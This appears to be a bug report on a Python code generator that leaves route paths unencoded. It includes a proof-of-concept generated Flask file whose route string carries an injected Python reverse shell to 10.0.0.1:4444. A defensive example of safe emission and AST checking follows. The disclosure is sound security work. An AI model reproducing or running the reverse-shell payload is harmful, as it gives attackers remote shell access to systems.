Describe the bug

Python code generator does not encode payloads and could be used to inject malicious payloads.

To Reproduce

If you create a definition as follows, you can see the Python code generation does not encode the paths data that is sent.

This results in:

```python
from flask import Blueprint, request
from webargs.flaskparser import parser
from marshmallow import Schema, fields
from ..schemas import model
from .. import impl

bp = Blueprint('nothing', __name__)

@bp.route('/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#', methods=['get'])
def CodeInjection():
    return impl.nothing.CodeInjection()
```

Screenshots
![image](https://user-images.githubusercontent.com/5957650/173449072-37bacf6e-b199-464b-8953-273b87715e52.png)
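
One way a generator can emit the route decorator so that a path taken from the definition stays data, as an added example (not the project's code): `emit_unsafe` mirrors the reported pattern, `emit_safe` validates the value and encodes it with `repr()`, and `stays_data` checks an emitted line by parsing it. The function names, the allow-list and the sample path with its harmless `marker` tail are assumptions constructed for illustration.

```python
import ast
import re

# Conservative allow-list for route paths (an assumption; adjust to the spec in use).
SAFE_PATH = re.compile(r"/|(/[A-Za-z0-9._~{}-]+)+/?")
METHODS = {"get", "post", "put", "patch", "delete", "head", "options"}

def emit_unsafe(path, method):
    # Reported pattern: the spec value is pasted between quotes unencoded.
    return f"@bp.route('{path}', methods=['{method}'])"

def emit_safe(path, method):
    # Validate first, then let repr() produce the Python string literal.
    if not SAFE_PATH.fullmatch(path):
        raise ValueError(f"rejected route path: {path!r}")
    if method.lower() not in METHODS:
        raise ValueError(f"rejected HTTP method: {method!r}")
    return f"@bp.route({path!r}, methods=[{method.lower()!r}])"

def stays_data(decorator_line, path):
    """True only if the emitted line parses to a single function whose
    decorator's first argument is exactly `path` as a string constant."""
    src = decorator_line + "\ndef handler():\n    return None\n"
    try:
        body = ast.parse(src).body
    except SyntaxError:
        return False
    if len(body) != 1 or not isinstance(body[0], ast.FunctionDef):
        return False
    decos = body[0].decorator_list
    if len(decos) != 1 or not isinstance(decos[0], ast.Call) or not decos[0].args:
        return False
    arg = decos[0].args[0]
    return isinstance(arg, ast.Constant) and arg.value == path

# Constructed input: the quote ends the literal early; the tail is a harmless marker.
HOSTILE = "/nothing/x', methods=['get']);marker=1;#"

if __name__ == "__main__":
    print(stays_data(emit_unsafe("/nothing/ok", "get"), "/nothing/ok"))
    print(stays_data(emit_unsafe(HOSTILE, "get"), HOSTILE))
    print(stays_data(f"@bp.route({HOSTILE!r})", HOSTILE))
```

Running `stays_data` over every emitted decorator in the generator's test suite catches any template that still concatenates spec values into source text.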